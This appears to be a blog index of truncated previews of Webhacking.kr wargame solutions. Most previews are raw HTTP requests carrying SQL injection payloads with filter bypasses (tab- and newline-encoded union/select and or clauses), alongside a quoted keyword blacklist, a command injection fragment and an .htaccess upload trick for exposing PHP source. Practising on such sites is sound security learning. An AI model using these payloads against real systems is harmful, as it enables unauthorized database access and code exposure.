Hacking

(65)
Webhacking.kr 56 POST /challenge/web/web-05/mem/login.php HTTP/1.1Host: webhacking.krProxy-Connection: keep-aliveContent-Length: 18Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://webhacking.krUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36 1HTTPS: 1Content-..
Webhacking.kr 38 Solve the nonogram, then 1||1=1
Webhacking.kr 7 Let's make 2. GET /challenge/web/web-07/index.php?val=-1)%09union%09select%093-1%23 HTTP/1.1Host: webhacking.krProxy-Connection: keep-aliveCache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36 1HTTPS: 1Accept-Encoding..
Webhacking.kr 18 Entering 1 shows that the result is guest. GET /challenge/web/web-32/index.php?no=100%0aor%0ano=2 HTTP/1.1Host: webhacking.krProxy-Connection: keep-aliveCache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36 1HTTPS: 1Accept-Encoding: ..
Webhacking.kr 48 '&l's hello challenge44_PaSs_w0Rd___.php index index.php
Webhacking.kr 48 This is a Command Injection problem. Imagine a function that processes a file. POST /challenge/bonus/bonus-12/index.php HTTP/1.1Host: webhacking.krProxy-Connection: keep-aliveContent-Length: 372Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://webhacking.krUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome..
Webhacking.kr 18 (eregi(" |/|\(|\)|\t|\||&|union|select|from|0x",$_GET[no])) exit("no hack"); The query is select id from challenge18_table where id='guest' and no=(input value), so -1 or
Webhacking.kr 28 It looks like we need to see the source. Let's upload a .htaccess file. AddType Application/x-httpd-php-source .phps php_flag engine 0 php_value engine "off"